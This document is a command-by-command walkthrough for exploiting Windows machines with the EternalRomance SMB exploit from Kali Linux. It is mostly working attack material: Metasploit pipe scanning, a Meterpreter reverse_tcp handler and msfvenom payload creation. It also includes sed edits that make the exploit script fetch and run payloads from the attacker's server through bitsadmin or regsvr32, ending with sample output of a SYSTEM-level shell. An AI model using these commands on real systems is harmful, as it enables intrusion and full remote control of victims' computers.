NSA's EternalRomance exploiting from KAli Linux

1. #1. – Test Target IP first to see if exploitable
2. msfconsole
3. use auxiliary/scanner/smb/pipe_auditor
4. set RHOSTS [TargetIP]
5. exploit
6.  
7. *choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…
8.  
9. #2 – Create Metasploit Handler
10. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
11. msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"
12.  
13.  
14.  
15. #3. – Grab Exploit Scripts in console 2
16. wget https://www.exploit-db.com/download/42315-O EternalRomance.py
17. wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
18.  
19.  
20.  
21. #4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
22. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
23. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
24. sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py
25.  
26.  
27.  
28. #4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
29. git clone https://github.com/CroweCybersecurity/ps1encode .
30. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
31. echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
32. chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
33. sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py
34.  
35. Credits for this regsvr32 payload idea:Sheila Berta / Casey Smith / CroweCybersecurity
36. #5. – Start Webserver
37. service apache2 start
38.  
39. ##################################
40. # Exploit it(change the TargetIP and named pipe if you want)
41. python EternalRomance.py [TargetIP] netlogon
42.  
43. If all goes well a shell shall rain down on ya.
44. [*] Sending stage (957487 bytes) to 192.168.128.19
45. [*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
46. msf exploit(handler) > sessions -i 1
47. [*] Starting interaction with 1…
48. meterpreter > getuid
49. Server username: NT AUTHORITY\SYSTEM